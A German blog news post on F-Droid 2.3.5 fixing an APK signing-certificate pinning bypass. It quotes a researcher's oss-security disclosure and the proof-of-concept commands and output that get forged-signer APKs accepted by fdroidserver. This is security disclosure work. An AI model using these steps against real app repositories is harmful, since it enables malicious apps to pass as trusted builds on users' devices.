Mastodon
Zuletzt aktualisiert am
BREAKING NEWS: F-Droid fixt größeres Zertifikatsproblem in v2.3.5

BREAKING NEWS: F-Droid fixt größeres Zertifikatsproblem in v2.3.5

Die lange schwelenden Konflikte rund um Best Practice bei F-Droid zeitigen nun erste, konstruktive Früchte. So fixt die ganz frische Version 2.35 Probleme rund um v1-only-Signaturen. Update wärmstens empfohlen.

Fdroid v2.35 ist raus und behebt Sicherheitsprobleme in Verbindung mit v1-only-Signaturen. Ein zeitiges Update wird daher angeraten. Calling all F-Bots…

💱 Changelog:

  • Behebung eines Problems, bei dem APKs mit reinen v1-Signaturen und targetSdkVersion < 30 in böser Absicht erstellt werden konnten, um AllowedAPKSigningKeys zu umgehen !1588
  • Ignoriere  apksigner v33.x, es hat Fehler bei der Überprüfung von APKs mit v3/v3.1-Signaturen. !1593
  • Synchronisiere Übersetzungen für: ca cs de es fr ga ja pt_BR pt_PT ru sq sr uk zh_Hans

s3n🧩net wünscht viel Vergnügen mit Ihrem freien Androiden

⏰ Update: Noch nicht ALLE Problemchen gefixt. Stay tuned…

⏰ Update: Es ist kompliziert

Weitere Infos: https://www.openwall.com/lists/oss-security/2025/01/20/1

⏰ Update: Es ist wirklich kompliziert

Noch mehr Infos: https://www.openwall.com/lists/oss-security/2025/01/20/1

Message-ID: <Z42Y1FjRnsbw5GZD@nihonium>
Date: Mon, 20 Jan 2025 01:29:08 +0100
From: Fay Stegerman <flx@...usk.net>
To: oss-security@...ts.openwall.com
Subject: fdroidserver AllowedAPKSigningKeys certificate pinning fundamentally
 unreliable

Hi!

Another update for [1,2,3], still published at [4]: another PoC (bringing
the total to 6) and a lot of new background information.  I've attached the
new and updated files and included the new sections from the README with the
updates below.

- Fay

[1] https://www.openwall.com/lists/oss-security/2024/04/08/8
[2] https://www.openwall.com/lists/oss-security/2024/04/20/3
[3] https://www.openwall.com/lists/oss-security/2025/01/03/1
[4] https://github.com/obfusk/fdroid-fakesigner-poc

 

⏰ Update: aus dem POC

Bei IzzyOnDroid wird (noch) fdroidserver verwendet. Allerdings setzt IzzyOnDroid auf die vom Security-Experten sowohl im entsprechenden Issue bei fdroidserver als auch im POC empfohlenen Patches.

 

⏰ Update: obfusk (f-droid fakesigner mit einem Update von heute

 Update (2025-01-22)

 

APKsigner

It seems F-Droid is now blaming the bugs in their own code on apksigner [17]:

apksigner v33.0.x falsely verifies invalid APK which leads to wrong cert extracted for AllowedAPKSigningKeys

They are clearly aware that the APK, whilst indeed containing a v3.1 signature without a corresponding v3 signature, is considered perfectly valid by Android itself and installs without any problems on Android 13-15:

I could install the poc-v6.apk in an SDK-34 emulator.

Yet they blame apksigner versions supporting v3.1 signatures but lacking an extra check that was added in later versions instead of acknowledging that the reason fdroidserver incorrectly returns the wrong certificate is that their own code is simply ignoring v3.1 signatures: yet another example that "different implementations can open up exploit vectors" and still nothing done to address that underlying issue.

NB: apksigner is correct to have added this extra check as v3.1 signatures should always have a corresponding v3 signature. But the lack of a corresponding v3 signature does not have any security implications for Android, which correctly considers such signatures valid. And there would have been no security implications for fdroidserver either if not for its fundamentally broken approach to extracting the certificate using custom Python code instead of relying on apksig for both verification and extraction to guarantee the extracted certificate is the same one actually used for verification.

·

POC

NB: you currently need the signing branch of apksigtool [9].

NB: the "fake" signer shown here is from the official F-Droid client (its APK has a v1+v2+v3 signature), the one apksigner sees is randomly generated by make-key.sh; the app.apk used for testing had minSdk 26 and a v2 signature only. Using APKs with other signature scheme combinations is certainly possible, but might require adjusting the PoC code accordingly.

$ ./make-key.sh             # generates a dummy key
$ python3 make-poc-v1.py    # uses app.apk (needs minSdk >= 24) as base, adds fake.apk .RSA
$ python3 fdroid.py         # verifies and has fake.apk as signer according to F-Droid
True
43238d512c1e5eb2d6569f4a3afbf5523418b82e0a3ed1552770abb9a9c9ccab
$ python3 make-poc-v2.py    # uses app.apk as base, adds signing block from fake.apk
$ python3 fdroid.py         # verifies and has fake.apk as signer according to F-Droid
True
43238d512c1e5eb2d6569f4a3afbf5523418b82e0a3ed1552770abb9a9c9ccab
$ apksigner verify -v --print-certs poc.apk | grep -E '^Verified using|Signer #1 certificate (DN|SHA-256)'
Verified using v1 scheme (JAR signing): false
Verified using v2 scheme (APK Signature Scheme v2): true
Verified using v3 scheme (APK Signature Scheme v3): true
Verified using v4 scheme (APK Signature Scheme v4): false
Signer #1 certificate DN: CN=oops
Signer #1 certificate SHA-256 digest: 029df1354735e81eb97c9bbef2185c8ead3bc78ae874c03a6e96e1e1435ac519
 
$ mkdir fakesigner
$ cd fakesigner
$ fdroid init -d oops --repo-keyalias fakesigner
$ mkdir metadata
$ printf 'Name: MyApp\nAllowedAPKSigningKeys: 43238d512c1e5eb2d6569f4a3afbf5523418b82e0a3ed1552770abb9a9c9ccab\n' > metadata/some.app.id.yml
$ cp /path/to/poc.apk repo/
$ fdroid update
$ jq '.packages[].versions[].manifest.signer.sha256' < repo/index-v2.json
[
  "43238d512c1e5eb2d6569f4a3afbf5523418b82e0a3ed1552770abb9a9c9ccab"
]

Stay tuned…

Comments